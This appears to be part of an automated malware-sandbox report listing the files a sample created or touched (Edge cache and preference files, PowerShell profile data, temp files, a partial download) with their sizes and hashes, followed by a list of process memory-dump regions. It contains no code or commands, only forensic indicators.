c6a13d52bda60c56434b9e89963f8edba6b4a0ba32424e03ea5a475697253ae5b0134bb8f2daa41d6def6e53b0f79ab2eaf4699dea6d3c6bd51c253aa619d74b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
76KB

MD5
5352c790cc449ef4398177540125342a

SHA1
d51e0c4b8f9595627111fe0c4483c3f4a0e495b6

SHA256
c2fce3bf7ff28120cea788d232bc23dfce032a602ee5b4d26c205d32de5b4128

SHA512
8850a7f409caba70ee0b17c489743bf6dee81d5be917dee7daf5a5056ce1035c1a1f98129af78d1ed8a0136fda85a3509d972e6d3a46e881b355c2ef191a69d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
101KB

MD5
2c5c0200df77fc2c4a5eee781859f940

SHA1
214ec1c4ac9921e44531767cbeb61885a913e13a

SHA256
b500b380fea25c4a742abf16e07e6224e9fc5aa22a9d38f9f6b119f5d460ee29

SHA512
9db1f3131bf76cbccd13440035c91dfb185443aa1e122aa3478ead6c065a4623bbb3a29c38de37c01503e987f3b71b89640b086ce7acb84adce9e98ffd868847

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
3754f662941bbfb30dc9ccebd777ee35

SHA1
5be2f9b3bf0202f26790372c10ce0984c199f6a4

SHA256
f8dc160bb4b46c32c7794dd136d2f1f7315d8d2a37bfc89c314ce8a6d5692617

SHA512
cc92f4e10e6cb9369c721717a6f7d981175c4f329aaec97762f950c36ca546e1cbfdc28b392f6c623024385f016b84f6527f2a16c8afbd67e7fdfe701bf54ebe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
2KB

MD5
a0553241a8d86b5c6b0189d56c7ceb20

SHA1
160d3a03cd8ef407b60508ebb2774133e00d5e71

SHA256
ad2abcdeb3f783ad59002a74d3789d9cba9a37adbdcb0b3bea34b8798d46bbfe

SHA512
c201417eaa6890ff32b68e7b86bb4bfc1c80f483ee3f7292ea5395299e714d280530ae220277e1c81c07d027d2608958aa3e3a1a603aa6b85d7ec35cab04d851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
9d09de5a65c5816b1563d77276fa397e

SHA1
1f4119717206625fd6bc44d84cac5458ad98ad5c

SHA256
b8e3f11e9793e8664411d1227354d7e549f61096d779d2e50593e46b7e2e32da

SHA512
dbb27bb7c33f76ff62642ffe67cfd700a861e3d5b7b0b2ac7ab6688cbb19b6a333ab42b5c12528de36ece1b50c339fd98a664985473f98af0d1e2191a2eb5384

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
e773e9d39ea408d15905cf83c7743f89

SHA1
3064273b4ee56f85c7fb11cf55ad75b1cde7cd41

SHA256
cf78e6d4254978b562bc37295814e21bf98f7460d5fc77691491811a983242f0

SHA512
2d21b70f804d3c79b3d26bc8760c684beb93fc3005a2c092c2c5cfd3140adc10366a80c549cbe0575d98b86a80955e806be9b7c78650ce3f4dd760e6302f0ce8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
221cf64ec2bc29b24b38203bb1758cfc

SHA1
78756238fd6b9ea01d02cc23bef6fbaed8a32248

SHA256
724ad5c868dcec9a782737c23a71e35773b8178faf77b1575497b273daaf1ee2

SHA512
d93cd3da980f3ac3ee37820b1ffb57261660600f2e71d68370986f2cb3a7784a38a447834d1bed85d550bdffddaaf3053575e44476ea82758214857175512c59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
0515df01558fa6d49b4413da79ba6c85

SHA1
91f9a5a4318e9a31b5bc22f62503fddc24550755

SHA256
3ecd22e94b4fbc99ebbd97bda12f4b1b6271c1d5f6a26b043e6e0cf453cbff34

SHA512
dcf847006b7dcc9bc33483f8feafd3bb059d6e698caa911554005716ddbfc83bee71b6c6c218580a23af905fe7cbde9f83bd9495db700ae4340862780fecbf79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a887819ba3d176ef7112060d26c9c0bf

SHA1
b9da2d45ba77cbf2e4e1ba1dd4a2f91df26daa16

SHA256
1a81d4227fb681bbd64065290819b56335b11c8447304fa5290059a8c2f28b6f

SHA512
92ef45d4fd80f876daf8415712d67552b3635ea64e14b73b76398633419605b7158f26e79c9c8f8817881f20452e0e5de163f6a96054d322a92ae5ece93c8778

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4d3ff45e987ea058baa08fa93d4d63fd

SHA1
38b899adaf6da3aff0930e77acffffb2585589a2

SHA256
e86d535fdb0a1449ac0c506e9eae6f9dca78ac4c79b4191789bf1fda99dadbe8

SHA512
a927659035c2a4cea61d447b0d011a420a6b2041b9d48ffb717c29165819f93c4cc397f57bfaea5bc636666fb56040847a948fd1772ce1fcdd16504e24da5b55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5c7bd8cb592bbd504e9d761325989a98

SHA1
00943d42be0260936f05814935d45febdd6a6dd3

SHA256
3a861bf25084404434ccddee50ad80697d7d07b85f0ea46848221b4c5daab970

SHA512
8d717eddfe10e35c13cd8aa7866764eb4a176c2cb2cdb533e1d4bb1526d2ab46f256575435fd59adf37ed43e0c0bf4538bd5e8367cc2a98ed194c51fe486f0bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c1e0578d392c4273e9b8da68c5a66a73

SHA1
50344621166016fd0b0fc9680f9bf1f479d201a0

SHA256
ae0ba421ec498bd8936e8810c9a4b54854e1c8e7ccaef6b456e207c527b7fe9b

SHA512
c5df6c7bc5e0e1a84f1cc1c459208e821dd0dc9744cd88b3281fbc6aedae8bd1c82c915fa6431c74552ff91e6992a68a2aec6c4e76be9b7fde35b2425f2fc1a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
aeec6f5b7731796556eaad1d48aee65b

SHA1
f567e808ed6a802d59ec8c640e5814388e090720

SHA256
fd6c943cbbdc3483b5a07941dc71e3a461ec42ef02e0e927d1da19146a24363f

SHA512
66dc95b9824550a36b1d94119ae8e940f2fdbb161d59c26db350d9aa3b031f6c7ce7f5c5606eb86a9bc9d2bcaadfa33fd82f38830f19ca2be440f00395154d08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
96c9d581cfb5f15fce3f11be06735ea3

SHA1
93464cb23333b44ebe83643eb94329101f2ad4b7

SHA256
07b70c5ac76adc19ca26500e3c3fd380eae2ece3f198a56eaf538e5b8ff04c85

SHA512
7c0080a1610321a756dab29b0b6341ba63e2eaa31e105d45f3c556ca84148bebc4ec50e7c063b7e4c32287e15a3a6e2d1169eeeac767f1c719f62c0b56abff5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fl2sequy.rl2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\alpgfzxbogyewrle

Filesize
4KB

MD5
c0ab2847671ed5375328c5127a02cc72

SHA1
dc2bcb51562fb17e5c8787833bc0181d88a5b75e

SHA256
e961f466a0638bc99182d0056245e2d8bf1ccc13a189b802aada981f379e2384

SHA512
0b8b634d21ac71e02cef86687bf84b6fcecfd24dafab8130f42ce8b4b3f308a2e1b1fa7bf8d37f2eda76efae2b30b8d39f41d808d771562d8545ed144241924f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 139806.crdownload

Filesize
600KB

MD5
2b1f137f22ac559ec305ce5cfa8890b4

SHA1
78eea4d0412efdce79ecd7bd36381d9fcec3b07c

SHA256
87a46f9efd26fa0b9182f12ee89ef19975fab1927d056629142608f27cc5f4b1

SHA512
d772cf3cda1ac8368992d21217cd6c866a5554bc3f4e9ee728709c03d72e402f8bfcd5a21afc6e58dbcdba4090b0f9970b7adab857b1b6d85d123c24a616383c

Download Submit
memory/3952-48-0x00000248E8270000-0x00000248E8292000-memory.dmp

Filesize
136KB

Download
memory/4616-97-0x0000029C55AF0000-0x0000029C55C12000-memory.dmp

Filesize
1.1MB

Download
memory/5324-163-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/5324-102-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-160-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/5324-687-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-164-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/5324-177-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-176-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-686-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-99-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-666-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-667-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-107-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-106-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-650-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-489-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-490-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-651-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-165-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-108-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-113-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-111-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-110-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5324-109-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5508-117-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5556-120-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5556-123-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5556-128-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/5568-121-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5568-122-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5568-127-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/5584-126-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5584-125-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/5584-124-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/6064-168-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download